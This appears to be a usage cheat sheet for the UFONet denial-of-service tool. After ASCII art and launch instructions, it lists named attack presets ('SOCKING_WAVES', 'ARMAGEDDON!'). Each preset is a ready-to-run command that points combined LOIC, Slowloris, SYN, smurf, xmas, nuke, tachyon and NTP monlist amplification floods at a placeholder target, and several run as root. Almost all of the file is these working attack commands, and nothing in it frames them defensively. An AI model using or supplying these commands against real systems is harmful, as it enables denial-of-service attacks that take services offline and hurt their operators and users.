
                      .   *        .       .
       *      -0-
          .                .  *       - )-
       .      *       o       .       *
 o                |
           .     -O-
.                 |        *      .     -0-
       *  o     .    '       *      .        o
              .         .        |      *
   *             *              -O-          .
         .             *         |     ,
                .           o
        .---.
      _/__~Y_\_     .  *            o       '
     (_________)             .
                 .                        *
       *               - ) -       *

-----------------------------------------------------------------------------
+_UFONET_FAQ (online):
-----------------------------------------------------------------------------

 -> https://ufonet.03c8.net/FAQ.html

-----------------------------------------------------------------------------
+_METHODS_TO_LAUNCH_IT:
-----------------------------------------------------------------------------

 0: When UFONet is installed:

 ufonet <options>

 1: When Python3 is set as environment variable:

 ./ufonet <options>

 2: Forcing python3:

 python3 ufonet <options>

 3: Forcing Python3 version 3.5:

 python3.5 ufonet <options>

----------------------------------------------
+_PALANTIR-3.14 (non-root): 
----------------------------------------------

 ufonet -a "http://target.com" -r "100" --loic "1000" --loris "1000"

----------------------------------------------
+_SOCKING_WAVES (instant-knockout!) (as root):
----------------------------------------------

 ufonet -a "http://target.com" -r "100" --nuke "10000"

----------------------------------------------
+_XCOM-1 (only DDoS) (as root): 
----------------------------------------------

 ufonet -a "http://target.com" -r "100" --spray "1000" --smurf "1000" --tachyon "1000" --monlist "1000"

----------------------------------------------
+_XCOM-2 (only DoS) (as root):
----------------------------------------------

 ufonet -a "http://target.com" -r "100" --loic "1000" --loris "1000" --ufosyn "1000" --xmas "1000" --nuke "1000"

----------------------------------------------
+_ARMAGEDDON! (with ALL!) (as root):
----------------------------------------------

 ufonet -a http://target.com -r "100" --loic "1000" --loris "1000" --ufosyn "1000" --spray "1000" --smurf "1000" --xmas "1000" --nuke "1000" --tachyon "1000" --monlist "1000" --threads "100"

-----------------------------------------------------------------------------
+_UFONET_EXAMPLES (online):
-----------------------------------------------------------------------------

 -> https://ufonet.03c8.net/#examples

-----------------------------------------------------------------------------

